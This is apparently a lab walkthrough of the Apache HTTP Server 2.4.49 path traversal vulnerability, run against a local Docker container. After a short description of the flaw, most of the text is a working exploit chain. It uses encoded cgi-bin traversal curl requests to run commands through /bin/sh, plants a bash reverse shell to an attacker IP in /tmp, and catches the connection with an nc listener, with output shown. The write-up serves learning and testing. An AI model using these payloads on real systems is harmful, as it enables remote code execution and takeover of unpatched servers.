A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.
If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.
This issue is known to be exploited in the wild.
This issue only affects Apache 2.4.49 and not earlier versions.
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
$ docker-compose build
$ docker-compose up
Confirm it works
$ curl http://localhost:1234
<html><body><h1>It works!</h1></body></html>
Victim : localhost:1234
Attacker : 192.168.1.12
According to the documentation, this is a flaw that allows us to execute code on remote (RCE).
We can exploit it by doing a curl with the cgi-bin folder.
$ curl 'http://<victim_ip>/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; <command>'
-
1. RCE
Let's see if we actually have access to command, sayid
:$ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; id' uid=1(daemon) gid=1(daemon) groups=1(daemon)
-
2. Reverse shell
We will test a reverse shell by creating a bash file on the victim's server.
Let's take as an example the reverse shell in bash found on the PayloadsAllTheThings repo.Here is an example :
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
Let's create the file
vuln.sh
on the victim's machine in the/tmp/
folder !
This file will contain our reverse shell that we can run remotely. It will connect to our local machine on port 44.$ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; echo "#!/bin/bash\nbash -i >& /dev/tcp/192.168.1.12/44 0>&1" > /tmp/vuln.sh'
You can check the contents of the file with the
cat
command$ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; cat /tmp/vuln.sh' #!/bin/bash bash -i >& /dev/tcp/192.168.1.12/44 0>&1
-
3. Listener with ncat
Let's create the listener on the local machine.$ nc -lvnp 44
All that remains is to execute the remote file.
$ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; bash /tmp/vuln.sh'
Response :
Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::44 Ncat: Listening on 0.0.0.0:44 Ncat: Connection from 172.19.32.1. Ncat: Connection from 172.19.32.1:58963.